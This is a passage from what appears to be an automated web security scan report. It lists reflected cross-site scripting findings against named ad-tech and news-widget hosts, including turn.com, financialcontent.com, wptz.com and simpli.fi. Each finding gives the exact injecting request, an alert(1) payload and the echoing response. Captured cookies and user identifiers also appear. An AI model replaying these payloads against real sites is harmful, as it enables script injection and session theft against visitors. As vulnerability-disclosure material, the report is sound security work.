Cookie: partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyI4NjYzNDk2NzYyMjk0MzM3MjY1IiwgNzM0MjM2XSwgIjQiOiBbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsIDczNDIyOV19; uid=dcb84907-869e-4e7d-baf7-9761469e8965; segments_p1=eJzjYuF4vJaJi5mjMYKLheN5PyOQfDyBEShwkgNINEUAiX8g1n8fILGRAwAJqArM

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 11 Apr 2011 16:31:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 11-Apr-2011 16:30:58 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 299

document.write('<img width="0" height="0" src="http://tag.admeld.com/match47500';alert(1)//51d2b9b58a7?admeld_adprovider_id=300&external_user_id=dcb84907-869e-4e7d-baf7-9761469e8965&Expiration=1302971478&custom_user_segments=%2C11265%2C11266%2C18531%2C18407%2C1097%2C1073%2C38627%2C1150%2C9855"/>
...[SNIP]...

1.96. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd57a"><script>alert(1)</script>0a868d8e61c was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=cd57a"><script>alert(1)</script>0a868d8e61c&sp=y&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1; uid=4608069584519221037

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Sat, 08-Oct-2011 16:31:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:20 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&rnd=4424732433026300716&fpid=cd57a"><script>alert(1)</script>0a868d8e61c&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.97. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9acee"><script>alert(1)</script>d7c2d8d54c7 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=9acee"><script>alert(1)</script>d7c2d8d54c7&admeld_call_type=iframe&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=SW3rJqgjoGiWbsxPhJhuUWWxMGxBqXxlA7D4q3Fl0GwiKyVDZ-rlUa0PjsPAjhgqStkopvvsJjaal-ufKVKqXkB03KyfIYpUpwtuzDJ_Sar7e7JoB80Eyo7R1tfbpJ0eSKfnqP_XlFpzVu_NoBBDZf9ryhlXrOTIDLs6C5xYHwpXtg9v_8jp5kTH7j39bXO4HDAiYSWCf5TBxsTExpnDU-v7KYWwWySyXkfDPDV-90Ue7hujMrvtUY_HOzLLyxwv_k_WpVD1JlJ7wTXZp93gmXyGPktyqGq8AiF_9pGEULyDkw085boggUVNqI7LSpEciP1S6sY_4cbvTHGh_d5L4M2Y34-VIxRxrm3FNMwNqknU3Q4bI5W7lTITQmcWDWXNOxhfHiulcSpdCPufCeXVQBAN2VgvEMYtoUIh9zoiJ7cb_z_Zv6eqOhDMTIbw55SOLrPjw2_IYz3ZuGtYWAZLy7lobhRxhK7y214tJE76aWd_kg-ZEdanc90fnXgtJVs3zdKoHs-s6ourQpIu1BUXqe9NY9R0FFLnY-WSWcKKlWHHw3Jspg9faP3zaVLpnvgN8oSrQlTvHTstmPtZGHjqPSP0ejM63LRRDlKgB-853uBtSirquDzFGA9p44jqLK3f4LscmmzpkBgJLxKHAsFFjyh6Y5zkl1TBiIlnDmmKJhyo0oRzMvHykYeX9FLMbQ8G9mgZ2cDqwwmQZzMqCsZkVOfJTg_XDU56mTQdH2l7ql8VpPp5MG5XnklEXPyXHc-pfFF2s3dwkHxGaiVA20kK-J6KuQs_LwOPvzQpDuG9dNbgrjQUkFB5yftgNN38M2Bjl30yGuIFRAghkvG6HjVZ6HyGPktyqGq8AiF_9pGEULxPe8hUFHE8g9SabWo0E8RGMKpnHO-s5pzO2WZw5zfLrKjM26X_HQivaOXVI6rGEaaMWVYkNu7wPIhXuF40_123VpwLtdcLHNDm8GcOvspe-Q-igqd2bcsD7dfUNmWxbV3VWMkb_aLsCxsEnMVOX5E5YFw7AKKbNhAo6FAahFGuSw; fc=dEPMVIiYvtONV9jpk9DkXQyLbLTLmoxDqWV9gF0uTPvucCu1r5AQP_dtCZm2aJsazpYxj42KKzjVwuNPs4rt1xf3-af75uC-0PX6DzxDTAoc4kd67syCe9_zGNyNSePIsMBPVeJHxjpftOmXXvFTKA; pf=L5MO0qdKHkxVAs1r-dBZAVICFVVRojULXcUdCiWE_DzWmtZ8Ckr-ChxYFEOTgBiyn80YJ2icoIfewslpJRmSRHD2z0ji6gENI7UiUrBmIv7o9shIX27g1QvP1c0QMukRtSDU37zOz0DNE_e3YQHgt6PfhahENkA4k6rcd_yUFy9p-hKvqyNE9Rr8ioAUeiEMG4CCBugb2Y6MTgfIwgmcLBK5s3Fs844aAeTpp0nbQFccPj8VU4SIi83xitW9zSjuAvgCZESutjUEdNmYIQ31lCATfnMgILbvQ4xMuPQqLAgHZeAJs75EVnqq0zavBWyWJwFZsZdOB51cw1oZ9UpaJVMMlt7PvOlYtSv4FtGdwt2VYP-HkDJt0WDewvL54vJkOVFTzvB1vWGJ1KSsZdNYCEQB2WM1iCr-8Tnt4WJRQ1VrpjudXbSIMqSVZISkb6xz; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006; rds=15069%7C15069%7C15069%7C15069%7Cundefined%7C15069%7C15069%7Cundefined%7C15069%7C15069%7C15074%7C15074%7C15069%7C15074%7Cundefined%7C15069%7C15074; rv=1; uid=4608069584519221037

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4608069584519221037; Domain=.turn.com; Expires=Sat, 08-Oct-2011 16:31:20 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:31:19 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&rnd=7219586931718843848&fpid=4&nu=n&t=&sp=9acee"><script>alert(1)</script>d7c2d8d54c7&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.98. http://studio-5.financialcontent.com/worldnow [Module parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The value of the Module request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99bba'-alert(1)-'73353dd3a4c was submitted in the Module parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow?Module=snapshot99bba'-alert(1)-'73353dd3a4c&OutputMode=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:09 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:09 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 702


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot99bba'-alert(1)-'73353dd3a4c%26OutputMode%3DJS&Type=widget&Client=worldnow&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var scrip
...[SNIP]...

1.99. http://studio-5.financialcontent.com/worldnow [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5de31'-alert(1)-'8e569af08fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow5de31'-alert(1)-'8e569af08fe?Module=snapshot&OutputMode=JS HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:11 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:11 GMT
X-Cache: MISS from squid2.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid2.sv1.financialcontent.com:3128
Via: 1.0 squid2.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 730


var head=document.getElementsByTagName('head')[0];
var script=document.createElement('script');
script.type="text/javascript";
script.src='http://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow5de31'-alert(1)-'8e569af08fe%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot%26OutputMode%3DJS&Type=widget&Client=worldnow5de31'-alert(1)-'8e569af08fe&rand=' + Math.random();
head.appendChild(scrip
...[SNIP]...

1.100. http://studio-5.financialcontent.com/worldnow [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://studio-5.financialcontent.com
Path:   /worldnow

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67c45'-alert(1)-'c942bb7c086 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /worldnow?Module=snapshot&OutputMode=JS&67c45'-alert(1)-'c942bb7c086=1 HTTP/1.1
Host: studio-5.financialcontent.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=68446
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:34:10 GMT
Server: nginx/0.8.15
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Last-Modified: Sat, 09 Apr 2011 12:34:10 GMT
Expires: Sat, 09 Apr 2011 12:35:10 GMT
X-Cache: MISS from squid1.sv1.financialcontent.com
X-Cache-Lookup: MISS from squid1.sv1.financialcontent.com:3128
Via: 1.0 squid1.sv1.financialcontent.com (squid/3.0.STABLE16)
Vary: Accept-Encoding
Connection: close
Content-Length: 20457

document.write('\n');
document.write('<style>\n');
document.write('\n');
document.write('\/* FCWidget CSS Styles *\/\n');
document.write('.fcwidget * {\n');
document.write(' font-family: Arial,Verdana
...[SNIP]...
tp://tracker.financialcontent.com/track.js?Source=http%3A%2F%2Fmarkets.financialcontent.com%2Fworldnow%3FHTTP_HOST%3Dstudio-5.financialcontent.com%26HTTPS%3Doff%26Module%3Dsnapshot%26OutputMode%3DJS%2667c45'-alert(1)-'c942bb7c086%3D1&Type=widget&Client=worldnow&rand=' + Math.random();
head.appendChild(script);

_qoptions={
qacct:"p-0cUI5xpPZj8YQ"
};
var head=document.getElementsByTagName('head')[0];
var script=document.cre
...[SNIP]...

1.101. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ulocal.wptz.com
Path:   /service/isUserLoggedIn.kickAction

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 90e51<script>alert(1)</script>5adadb362d8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service/isUserLoggedIn.kickAction?callback=ka_isUserLoggedInKASideCallback90e51<script>alert(1)</script>5adadb362d8&as=62976 HTTP/1.1
Host: ulocal.wptz.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: alpha=65ce8f18a56e00003751a04dcb780000ea280400; __utmz=174914276.1302352179.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-2064108896-1302352190176; AxData=; Axxd=1; __utmv=; __utma=174914276.1441694128.1302352179.1302352179.1302352179.1; __utmc=174914276; __utmb=174914276.12.10.1302352179

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35BF8CB48F1E6719832598132E6EFC57; Path=/
Set-Cookie: as=62976; Expires=Sun, 10-Apr-2011 12:31:42 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
Content-Length: 97
Date: Sat, 09 Apr 2011 12:31:41 GMT
Set-Cookie: BIGipServerapp_server_pool=1823451328.39455.0000; path=/

ka_isUserLoggedInKASideCallback90e51<script>alert(1)</script>5adadb362d8({"isLoggedIn":"false"});

1.102. http://um.simpli.fi/am_js.js [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a92e4'-alert(1)-'7ca9a65bd05 was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338a92e4'-alert(1)-'7ca9a65bd05&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=338a92e4'-alert(1)-'7ca9a65bd05&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.103. http://um.simpli.fi/am_js.js [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_js.js

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10f86'-alert(1)-'cf2f0b7538c was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_js.js?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match10f86'-alert(1)-'cf2f0b7538c HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match10f86'-alert(1)-'cf2f0b7538c?admeld_adprovider_id=338&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.104. http://um.simpli.fi/am_match [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9729f'-alert(1)-'f20247805be was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=3389729f'-alert(1)-'f20247805be&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=0Cvz402XsBKiaCsFO2ZHAg==

Response (redirected)

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 11 Apr 2011 16:41:19 GMT
Content-Type: application/x-javascript
Connection: close
Content-Length: 185

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=3389729f'-alert(1)-'f20247805be&external_user_id=E3F32BD012B0974D052B68A20247663B"/>');


1.105. http://um.simpli.fi/am_match [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://um.simpli.fi
Path:   /am_match

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9d23e'-alert(1)-'a7e3cfc3d3f was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /am_match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=338&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9d23e'-alert(1)-'a7e3cfc3d3f HTTP/1.1
Host: um.simpli.fi
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302540075597&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
